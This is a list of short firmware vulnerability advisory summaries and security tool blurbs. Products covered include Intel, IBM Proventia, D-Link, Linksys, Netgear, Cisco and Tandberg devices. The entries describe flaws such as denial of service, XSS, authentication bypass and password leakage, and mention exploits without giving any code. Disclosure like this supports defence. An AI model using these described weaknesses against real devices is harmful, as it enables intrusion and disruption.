Vigilante Advisory #7 - A malicious user can crash an Intel Express 550F or a host behind it by sending a packet with a malformed header. To restart the box you need remove it from it's power source as the reset button loses functionality as well. Affected systems: Intel Express Switch 550F - Firmware version 2.63 - Firmware version 2.64.
e5543dcadd99ee203a752f663a687366bd68f30736388f7036df6793e11c9e4c
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6) is vulnerable to an Insecure Direct Object Reference vulnerability. When exploited by an authenticated attacker, such vulnerability could lead to compromising the security of the appliance, allowing OS command execution, local file inclusion resulting in exposure of appliance configuration files, source code, etc.
4faf8158f2565688d604706ac1cf4006697d9a3c4dc9926cebbe5d8ab0579ade
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to multiple persistent and reflected XSS attacks. When exploited by an external/internal attacker, such identified vulnerabilities could lead to Session Hijack, Information Disclosure, force installation of malicious file or Trojan on users' PCs, etc.
7d77648766361a40b7d96f7ef892d0dab12d44b36490044262f591af031bf755
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to XSRF attacks. When exploited by an attacker, the identified vulnerabilities could lead to compromising the security of the appliance, including unauthorized alteration of appliance's settings, DoS attacks, etc.
e79b5a9fb4e89af714cf275dfcd4e03761b0ba0e0db20144b1e00d48f36b7d68
Tandberg MXP systems with a firmware prior to 9.0 suffer from a SNMP related denial of service vulnerability.
7a27927c605b454f1e6b03e8335b08ee519475e3f0fc0627c3d6fe6dcd38f69e
McAfee UTM Firewall firmware versions 3.0.0 through 4.0.6 suffer from a cross site scripting vulnerability.
d74a18c2c94d3ec9137055c30cb90322d16fe5992676d7772281967380bf88d1
Secunia Security Advisory - A vulnerability has been reported in Snom VoIP Phone Firmware, which can be exploited by malicious people to bypass certain security restrictions.
513ca15470bda1ae480e9eab09b861ea156ef118cfa8ba1b1c7a18ee13b8a52b
iOmega Home Media Network Hard Drive firmware version 2.038 through 2.061 suffer from an unauthenticated access vulnerability.
2cd1de52837d1fdcc72f8f653ffe102295eda8e88b928a3da31fdfe6dfcfb58f
Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.
db51c425156ad6e9f3fa40fb9a1383e98edfded1cb0710c6c58c4a658f0b3a0b
Secunia Security Advisory - A vulnerability has been reported in Broadcom Integrated NIC Management Firmware for HP PCs, which can be exploited by malicious people to compromise a vulnerable system.
edbfcb722522d366f075a5e520a388cfcb72317593dd3a50d8e5e6df836bb7fc
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is designed after the non open source OFPW utility and is designed to work on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post install item) and pen tests (recovering the EFI firmware password).
83fe779b6bcdb2cbbb4da3359a7a5d0e75ca7ff27c8901c902ff4d15ec0f684b
Hacking D-Link Routers With HNAP - Multiple D-Link routers suffer from insecure implementations of the Home Network Administration Protocol which allow unauthenticated and/or unprivileged users to view and configure administrative settings on the router. Further, the mere existence of HNAP allows attackers to completely bypass the CAPTCHA login features that D-Link has made available in recent firmware releases.
e9ae50f05b83bf98f76e90aa3dd3f3e9bf3fea8493bf25bf0c5291e5191f43a3
The Bararcuda web firewall 660 with firmware 7.3.1.007 suffers from input validation vulnerabilities that allow for session hijacking and more.
bf65427cf42c5a384779e3d121dfd96b62f502dac235f59d56843334b08a4a7d
Obeseus is a light-weight, high-speed ip DDOS detector that has been designed to run on an Intel probe running an advanced 10 Gb/s FPGA card. Firmware Routines on the card ensure that the attack is identified right down to host/port with zero load on the PCI bus. This is the pre-port to FPGA beta version written in "c" with PCAP and BPF.
b67e244ec592a0c5a1242966f36937d8dfd7d5e17d6725951479d2a05fc108b9
The Everfocus EDSR firmware fails to correctly handle authentication and sessions. This remote exploit takes advantages of versions 1.4 and below and lets you view the live cameras of remote DVRs.
10026da1a7949dc0eaf28f986ef241f8679e65ad5c74df580ec8f86a61a39823
Cisco Security Advisory - Cisco Video Surveillance Stream Manager firmware for the Cisco Video Surveillance Services Platforms and Cisco Video Surveillance Integrated Services Platforms contain a denial of service (DoS) vulnerability that could result in a reboot on systems that receive a crafted packet. Cisco Video Surveillance 2500 Series IP Cameras contain an information disclosure vulnerability that could allow an authenticated user to view any file on a vulnerable camera. Cisco has released free software updates that address these vulnerabilities. There are no workarounds that mitigate these vulnerabilities.
3b56d120b6856f73ef48b6879e7de75cf47fb8f500ff02f80c93c32f09dfc51d
Secunia Research has discovered a vulnerability in Garmin Communicator Plug-In, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to a synchronisation error in the GARMINAXCONTROL.GarminAxControl_t.1 ActiveX control (npGarmin.dll). This can be exploited to bypass the domain locking and dialog box presented to the user asking for confirmation that the untrusted site may access private data. Successful exploitation allows full access (such as deleting data, retrieving personal information, or installing firmware updates) to any Garmin GPS products connected to the user's system. Garmin Communicator Plug-In (npGarmin.dll) version 2.6.4.0 is affected.
d2f086ac3f174a9241e5c568f24970ed3a5b1893adb4e0b56c252fa22c46ae09
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is designed after the non open source OFPW utility and is designed to work on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post install item) and pen tests (recovering the EFI firmware password).
32600871a5188868b50004beb3b523ddca7180f0dcad55c13de60f87401435fa
Linksys Wireless ADSL Router httpd denial of service exploit for WAG54G V.2 with firmware 1.02.20.
14dd874d904b5b4eacda3a2f64f6d57318849cd08be9a4e01e8fc280387d9dc3
Secunia Security Advisory - A vulnerability has been reported in Sun System Firmware, which can be exploited by malicious, local users to bypass certain security restrictions.
bdea59d092405f0d2b8d983835f4cf3a860a3658e439ddd72b003444fa34c3ad
The Netgear WN802T (firmware 1.3.16) with the MARVELL 88W8361P-BEM1 chipset suffers from a NULL SSID association request vulnerability that allows for denial of service and possibly code execution.
ccb13de54f066e877156a14ba07fa1ac4f865e9ef7de15ecd8de515a0d4f33f9
The Netgear WN802T (firmware 1.3.16) with the MARVELL 88W8361P-BEM1 chipset suffers from an overflow vulnerability when parsing malformed EAPoL-Key packets.
38d2065be0b8a4aeb8224079f08d4c79ba5ac17ce0b4e9162721a30007efe569
The password checking routine of the IBM Lenovo BIOS firmware fails to sanitize the BIOS keyboard buffer after reading user input, resulting in plain text password leakage to local users.
a488508939d0aa7156c8686aa75fbaba363e073efc4b44072a2a13c40dde1e04
The password checking routine of Intel BIOS firmware fails to sanitize the BIOS keyboard buffer after reading user input, resulting in plain text password leakage to local users.
a3dae1efa2a513a1e4d34e8620de7b40c67b3bd5327e513a672c4257d6bfcb28
Asterisk Project Security Advisory - An attacker may request an Asterisk server to send part of a firmware image. However, as this firmware download protocol does not initiate a handshake, the source address may be spoofed. Therefore, an IAX2 FWDOWNL request for a firmware file may consume as little as 40 bytes, yet produces a 1040 byte response. Coupled with multiple geographically diverse Asterisk servers, an attacker may flood an victim site with unwanted firmware packets.
033fd05fff387ab0474d5a49f0a057699dcb0943d8893658905cf254d19d1aa2
The Linksys WRT54G (firmware 1.00.9) suffers from multiple security bypass vulnerabilities.
6b72b26de9c2d8e0c66310a390f706c7cbc59b771a63edf2616425a62a197785